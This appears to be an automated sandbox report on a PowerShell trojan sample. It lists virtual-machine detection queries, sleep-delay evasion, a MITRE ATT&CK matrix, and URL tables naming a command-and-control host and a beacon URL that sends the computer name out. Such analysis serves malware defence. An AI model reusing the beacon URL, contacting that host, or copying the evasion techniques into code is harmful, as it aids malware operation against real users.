Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3908Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6005Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1779315827.00000287F4190000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
Source: powershell.exe, 00000000.00000002.1719127106.00000287DC978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine MSFT_MpComputerStatus MSFT_MpComputerStatusata>
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1719127106.00000287DC978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1719127106.00000287DC978000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1719127106.00000287DCD46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		121
Virtualization/Sandbox Evasion		OS Credential Dumping21
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture12
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps15%ReversingLabsWin32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=5270%Avira URL Cloudsafe
http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=5270%Avira URL Cloudsafe
http://kdemjgebjimkanl.top0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
kdemjgebjimkanl.top
45.61.136.138
truetrue
    		unknown
    www.google.com
    		142.250.185.132
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527true
      • Avira URL Cloud: safe
      		unknown
      http://www.google.com/false
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://crl.microsoftpowershell.exe, 00000000.00000002.1776222589.00000287F3C10000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE022000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE01E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE34E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE35D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE33F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE045000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://0.google.com/powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://kdemjgebjimkanl.toppowershell.exe, 00000000.00000002.1719127106.00000287DD122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.google.compowershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26sourcepowershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
